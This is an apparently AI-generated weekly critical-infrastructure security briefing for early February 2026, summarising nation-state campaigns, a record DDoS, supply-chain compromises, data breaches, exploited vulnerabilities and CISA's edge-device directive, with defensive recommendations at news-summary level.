Security Intelligence for Real-World Decisions
← Back to Archive

CISA Orders End-of-Life Edge Device Removal as New APT Breaches 37 Nations' Critical Infrastructure; Record 31.4 Tbps DDoS Attack Recorded

Critical Infrastructure Intelligence Briefing

Date: Friday, February 6, 2026

Reporting Period: January 30 – February 6, 2026

1. Executive Summary

This week's intelligence highlights significant developments across multiple critical infrastructure sectors, with immediate action required on several fronts:

  • CISA Issues Binding Operational Directive (BOD 26-02): Federal agencies must identify and remove end-of-life network edge devices, addressing a persistent attack vector exploited in major breaches. This directive has immediate implications for all critical infrastructure operators.
  • New APT Group Emerges with Global Reach: Security researchers have identified a previously unknown advanced persistent threat (APT) group that has successfully breached government and critical infrastructure organizations across 37 countries, demonstrating sophisticated capabilities and broad targeting.
  • Record-Breaking DDoS Attack: The AISURU/Kimwolf botnet launched a 31.4 Tbps DDoS attack—the largest ever recorded—signaling a significant escalation in volumetric attack capabilities that threatens availability of critical services.
  • Energy Sector Cybersecurity Legislation Advances: Five bills designed to strengthen energy sector cyber defenses cleared a House panel, following the Department of Energy's Liberty Eclipse cybersecurity exercise.
  • Supply Chain Compromise Alert: Counterfeit PLCs discovered in a water utility and compromised npm/PyPI packages highlight ongoing supply chain risks requiring enhanced verification procedures.
  • Critical Vulnerabilities Under Active Exploitation: SmarterMail vulnerability being exploited in ransomware attacks; new NGINX vulnerabilities discovered; n8n workflow automation platform flaw enables system command execution.

Immediate Actions Required:

  1. Inventory all network edge devices and identify end-of-life equipment for replacement
  2. Verify authenticity of industrial control system components, particularly PLCs
  3. Patch SmarterMail installations immediately if in use
  4. Review NGINX configurations for signs of compromise
  5. Assess DDoS mitigation capabilities against volumetric attacks

2. Threat Landscape

Nation-State Threat Actor Activities

New APT Group Targets Global Critical Infrastructure

Security researchers at CSO Online have disclosed details of a newly identified APT group that has successfully compromised government agencies and critical infrastructure organizations in 37 countries. The group demonstrates advanced capabilities including:

  • Sophisticated initial access techniques
  • Long-term persistence mechanisms
  • Cross-sector targeting indicating strategic intelligence collection objectives

Assessment: This represents a significant threat to critical infrastructure operators globally. Organizations should review indicators of compromise (IOCs) as they become available and enhance monitoring for anomalous network activity.

Source: CSO Online

Chinese Threat Actor Deploys 'DKnife' Implant

A Chinese threat actor has been utilizing the DKnife implant since at least 2019 to conduct adversary-in-the-middle (AitM) attacks. The malware targets:

  • Desktop systems
  • Mobile devices
  • IoT devices

While current reporting indicates targeting of Chinese users, the techniques and capabilities could be adapted for broader campaigns against critical infrastructure IoT deployments.

Source: SecurityWeek

Iranian Threat Group 'Infy' Resumes Operations

The Iranian threat group known as Infy (Prince of Persia) has resumed operations following Iran's internet blackout, deploying new command-and-control infrastructure and evolved tactics to evade detection. This group has historically targeted government and critical infrastructure entities.

Source: The Hacker News

Russian Cyber Operations Target Italy Pre-Olympics

Italian authorities have successfully defended against Russian hacker attacks targeting the country ahead of the Winter Olympics. This activity aligns with historical patterns of nation-state cyber operations surrounding major international events.

Source: CSO Online

Ransomware and Cybercriminal Developments

SmarterMail Vulnerability Exploited in Ransomware Attacks

A critical vulnerability in SmarterMail is being actively exploited by ransomware operators. The flaw allows unauthenticated attackers to execute arbitrary code remotely via malicious HTTP requests. Organizations using SmarterMail should:

  • Apply patches immediately
  • Monitor for indicators of compromise
  • Review email server logs for suspicious activity

Source: SecurityWeek

Ransomware Operators Abuse ISPsystem VMs

Ransomware groups are leveraging virtual machines provisioned through ISPsystem, a legitimate virtual infrastructure management provider, to host and deliver malicious payloads at scale. This technique provides:

  • Legitimate-appearing infrastructure
  • Rapid deployment capabilities
  • Difficulty in attribution and takedown

Source: Bleeping Computer

Buhlmann Group Ransomware Attack

German industrial company Buhlmann Group has been targeted by a ransomware attack, highlighting continued threats to manufacturing and industrial sectors.

Source: CSO Online

DDoS and Botnet Activity

Record-Setting 31.4 Tbps DDoS Attack

The AISURU/Kimwolf botnet has been attributed to a record-breaking DDoS attack peaking at 31.4 Terabits per second (Tbps). Key details:

  • Attack duration: 35 seconds
  • Represents significant escalation in volumetric attack capabilities
  • Cloudflare attributed the attack to this botnet

Implications for Critical Infrastructure: This attack volume exceeds the mitigation capabilities of many organizations. Critical infrastructure operators should:

  • Review DDoS mitigation contracts and capabilities
  • Ensure upstream provider relationships can handle volumetric attacks
  • Test incident response procedures for availability attacks

Source: The Hacker News

Supply Chain Threats

Compromised npm and PyPI Packages

Legitimate packages on npm and PyPI repositories have been compromised to distribute wallet stealers and RAT malware. The affected packages include those associated with dYdX, a decentralized exchange. This highlights:

  • Ongoing risks in software supply chains
  • Need for package verification and integrity monitoring
  • Importance of software bill of materials (SBOM) practices

Source: The Hacker News

Notepad++ Supply Chain Compromise

Hackers associated with the Chinese government utilized a Trojaned version of Notepad++ in a supply chain attack that persisted for approximately six months. This incident underscores the need for:

  • Software integrity verification
  • Monitoring of update mechanisms
  • Application allowlisting in critical environments

Source: Schneier on Security

Web Infrastructure Attacks

NGINX Server Compromise Campaign

An active campaign is compromising NGINX servers to hijack user traffic and reroute it through attacker-controlled infrastructure. The campaign targets:

  • NGINX installations
  • Baota (BT) management panels

Organizations should review NGINX configurations for unauthorized modifications and monitor for unexpected traffic patterns.

Source: The Hacker News, Bleeping Computer

AI-Powered Law Firm Website Cloning Scam

Researchers have exposed a network of 150+ cloned law firm websites created using AI in a sophisticated scam campaign. The operation:

  • Uses AI to clone professional websites at industrial scale
  • Hides behind Cloudflare and rotating IP ranges
  • Demonstrates evolving criminal use of AI technologies

Source: SecurityWeek

3. Sector-Specific Analysis

Energy Sector

Congressional Action on Energy Cybersecurity

Five bills designed to boost energy sector cyber defenses have cleared a House panel. This legislative action follows the Department of Energy's annual Liberty Eclipse cybersecurity exercise, which tests the resilience of the nation's energy infrastructure against cyber threats.

Key Implications:

  • Potential new compliance requirements for energy sector entities
  • Increased federal resources for energy cybersecurity
  • Enhanced public-private coordination mechanisms

Source: SecurityWeek

Romanian Oil Pipeline Operator Cyberattack

Conpet, Romania's national oil pipeline operator, disclosed a cyberattack that:

  • Disrupted business systems
  • Took down the company's website
  • Occurred on Tuesday, February 3, 2026

This incident highlights the ongoing targeting of energy transportation infrastructure by threat actors.

Source: Bleeping Computer

Water & Wastewater Systems

CRITICAL: Counterfeit PLC Discovered in Water Utility

WaterISAC has issued an alert regarding the discovery of a counterfeit programmable logic controller (PLC) in a water utility. This represents a significant supply chain security concern:

Risks of Counterfeit PLCs:

  • Unknown firmware modifications or backdoors
  • Unreliable operation potentially affecting water treatment
  • Potential for remote access by malicious actors
  • Difficulty in detection without specialized verification

Recommended Actions:

  • Verify authenticity of all PLCs through authorized distributors
  • Document serial numbers and compare against manufacturer records
  • Implement procurement controls requiring verified supply chains
  • Consider firmware verification tools where available

Source: WaterISAC

Nation-State and Hacktivist Attacks on OT Infrastructure

WaterISAC has released analysis of recent significant nation-state and hacktivist cyber attacks on OT infrastructure, providing context for water sector operators on evolving threats to operational technology environments.

Source: WaterISAC

Communications & Information Technology

VS Code Configurations Expose GitHub Codespaces

Security researchers have identified that VS Code-integrated configuration files are automatically executed in GitHub Codespaces when users open repositories or pull requests. This creates potential for:

  • Remote code execution attacks
  • Supply chain compromises through malicious repositories
  • Credential theft from development environments

Source: SecurityWeek

Substack Data Breach

Newsletter platform Substack has disclosed a security incident after a hacker leaked data including:

  • Nearly 700,000 user records
  • Email addresses
  • Phone numbers

The breach occurred in October 2025 but was disclosed this week.

Source: SecurityWeek, Bleeping Computer

Flickr Potential Data Breach

Photo-sharing platform Flickr is notifying users of a potential data breach through a third-party email service provider vulnerability, exposing:

  • Real names
  • Email addresses
  • IP addresses
  • Account information

Source: Bleeping Computer

Transportation Systems

TSA Rolls Out TSA ConfirmID

The Transportation Security Administration has successfully deployed TSA ConfirmID, enhancing identity verification capabilities at airport security checkpoints. This represents continued modernization of aviation security infrastructure.

Source: Homeland Security Today

Healthcare & Public Health

Healthcare Cybersecurity Crisis and Foundational Controls

New analysis of healthcare cyber losses indicates that foundational security controls remain the most effective at reducing risk in the healthcare sector. Key findings suggest:

  • Basic security hygiene prevents majority of successful attacks
  • Multi-factor authentication remains critical
  • Network segmentation significantly reduces breach impact
  • Regular patching addresses most exploited vulnerabilities

Source: Security Magazine

Financial Services

Betterment Data Breach Exposes 1.4 Million Accounts

Automated investment platform Betterment disclosed a data breach affecting 1.4 million accounts. Compromised data includes:

  • Email addresses
  • Personal information

The breach occurred in January 2026.

Source: Bleeping Computer

Government Facilities

Spain's Ministry of Science IT Shutdown

Spain's Ministry of Science announced a partial shutdown of IT systems following breach claims, affecting citizen- and company-facing services.

Source: Bleeping Computer

Italian University La Sapienza Cyberattack

Rome's La Sapienza university has been targeted by a cyberattack causing widespread operational disruptions to IT systems.

Source: Bleeping Computer

4. Vulnerability & Mitigation Updates

Critical Vulnerabilities Requiring Immediate Attention

Vulnerability Severity Status Action Required
SmarterMail RCE Critical Actively Exploited in Ransomware Patch immediately
n8n CVE-2026-25049 Critical Disclosed Patch immediately
Ingress NGINX (4 new flaws) High Disclosed Review and patch
End-of-Life Edge Devices High BOD 26-02 Issued Inventory and replace

n8n Workflow Automation Platform (CVE-2026-25049)

A critical vulnerability in the n8n workflow automation platform enables execution of arbitrary system commands via malicious workflows. Organizations using n8n should:

  • Apply available patches immediately
  • Review existing workflows for suspicious content
  • Restrict workflow creation to authorized users

Source: The Hacker News

Ingress NGINX Vulnerabilities

Four new vulnerabilities have been discovered in Ingress NGINX, a widely-used Kubernetes ingress controller. Organizations should review their Kubernetes deployments and apply patches.

Source: CSO Online

BYOVD (Bring Your Own Vulnerable Driver) Attacks

Attackers are exploiting a decade-old Windows driver flaw to disable modern EDR defenses. This technique allows threat actors to:

  • Load vulnerable legitimate drivers
  • Exploit driver vulnerabilities to gain kernel access
  • Disable endpoint detection and response tools

Mitigation: Implement driver blocklists and monitor for suspicious driver loading activity.

Source: CSO Online

CISA Advisories and Directives

BOD 26-02: End-of-Support Edge Device Mitigation

CISA has issued Binding Operational Directive 26-02 requiring federal agencies to:

  • Identify network edge devices that no longer receive security updates
  • Remove or replace end-of-life equipment
  • Implement compensating controls where immediate replacement is not possible

Applicability Beyond Federal Agencies: While binding only on federal civilian agencies, all critical infrastructure operators should adopt similar practices. Edge devices have been the initial access vector in numerous high-profile breaches.

Source: CyberScoop, Bleeping Computer, Homeland Security Today

CISA Vulnerability Scanning Testimonial Fact Sheet

CISA has released a new fact sheet highlighting the value of its vulnerability scanning services, including testimonials from organizations that have benefited from the free service.

Source: WaterISAC

CISA KEV Catalog Ransomware Updates

Concerns have been raised regarding CISA's practice of silently updating KEV (Known Exploited Vulnerabilities) catalog entries to indicate ransomware exploitation. In 2025, CISA updated 59 KEV entries to specify ransomware exploitation without prominent notification.

Recommendation: Organizations should regularly review the full KEV catalog, not just new additions, for updated exploitation context.

Source: SecurityWeek

CISA ICS Advisories

CISA released its weekly compilation of ICS advisories, alerts, and bulletins on February 5, 2026. Critical infrastructure operators should review these for applicable systems.

Source: WaterISAC

AI-Discovered Vulnerabilities

Claude Opus 4.6 Identifies 500+ High-Severity Flaws

Anthropic's Claude Opus 4.6 AI model has identified more than 500 previously unknown high-severity security flaws across major open-source libraries. This demonstrates:

  • Growing capability of AI in vulnerability discovery
  • Potential for both defensive and offensive applications
  • Need for organizations to monitor for patches in open-source dependencies

Source: The Hacker News

Recommended Defensive Measures

  • Edge Device Security: Conduct comprehensive inventory of all network edge devices; prioritize replacement of end-of-life equipment
  • Supply Chain Verification: Implement procedures to verify authenticity of hardware components, particularly PLCs and other ICS equipment
  • Software Integrity: Monitor package repositories for compromised dependencies; implement SBOM practices
  • DDoS Preparedness: Review mitigation capabilities against volumetric attacks exceeding 30 Tbps
  • EDR Protection: Implement driver blocklists to prevent BYOVD attacks

5. Resilience & Continuity Planning

Lessons Learned from Recent Incidents

Energy Sector: Liberty Eclipse Exercise

The Department of Energy's Liberty Eclipse cybersecurity exercise has informed the development of five new legislative proposals for energy sector cyber defenses. Key takeaways likely include:

  • Need for enhanced information sharing mechanisms
  • Importance of cross-sector coordination
  • Value of regular exercise programs

Healthcare Sector: Foundational Controls Effectiveness

Analysis of healthcare cyber incidents confirms that basic security controls remain the most effective risk reduction measures:

  • Multi-factor authentication
  • Regular patching
  • Network segmentation
  • Employee security awareness training

Supply Chain Security Developments

Hardware Supply Chain Risks

The discovery of counterfeit PLCs in water utilities highlights critical supply chain vulnerabilities:

  • Procurement Controls: Establish relationships with authorized distributors only
  • Verification Procedures: Implement incoming inspection for critical components
  • Documentation: Maintain records of component provenance
  • Monitoring: Watch for anomalous behavior from installed equipment

Software Supply Chain Risks

Multiple incidents this week highlight software supply chain threats:

  • Compromised npm/PyPI packages
  • Trojaned Notepad++ distribution
  • Malicious VS Code configurations

Recommended Practices:

  • Implement software composition analysis (SCA) tools
  • Maintain software bills of materials (SBOMs)
  • Use package signing and verification
  • Monitor for security advisories on dependencies

Cross-Sector Dependencies

This week's incidents illustrate interconnected risks:

  • Energy → All Sectors: Pipeline operator attacks can cascade to dependent industries
  • IT → All Sectors: Edge device vulnerabilities affect all sectors using network infrastructure
  • Financial → All Sectors: Fintech breaches can impact business operations across sectors

Public-Private Coordination

Operation Winter SHIELD

The FBI has released guidance on the most impactful cyber resilience actions organizations can take as part of Operation Winter SHIELD. This initiative provides prioritized recommendations for defensive measures.

Source: WaterISAC

6. Regulatory & Policy Developments

Federal Guidelines and Regulatory Changes

CISA BOD 26-02: Edge Device Security

The new binding operational directive establishes requirements for federal agencies regarding end-of-life network edge devices. While not directly binding on private sector entities, this directive:

  • Signals regulatory priorities
  • May influence future requirements for critical infrastructure
  • Provides a framework for voluntary adoption

U.S. Government Bans Foreign-Made UAS Purchases

The U.S. government has implemented a ban on purchasing foreign-made unmanned aircraft systems (UAS), with implications for:

  • Critical infrastructure operators using drones for inspection
  • Security operations utilizing aerial surveillance
  • Supply chain considerations for drone programs

Source: WaterISAC

Pending Legislation

Energy Sector Cybersecurity Bills

Five bills advancing through Congress address energy sector cyber defenses:

  • Enhanced information sharing requirements
  • Increased federal resources for sector security
  • Strengthened public-private partnerships

Energy sector entities should monitor these bills for potential compliance implications.

Source: SecurityWeek

International Developments

Italian Cyber Defense Operations

Italy's successful defense against Russian cyber operations ahead of the Winter Olympics demonstrates:

  • Effectiveness of proactive threat monitoring
  • Value of international intelligence sharing
  • Importance of event-based security planning

AI Governance

DOJ AI Use Cases Growth

The Department of Justice reports that AI use cases grew nearly 31% in 2025, indicating expanding government adoption of AI technologies. This has implications for:

  • AI security requirements
  • Governance frameworks
  • Potential regulatory models for critical infrastructure AI use

Source:

Disclaimer

This briefing is generated using AI analysis of public news sources. Always verify critical information through authoritative sources before taking action.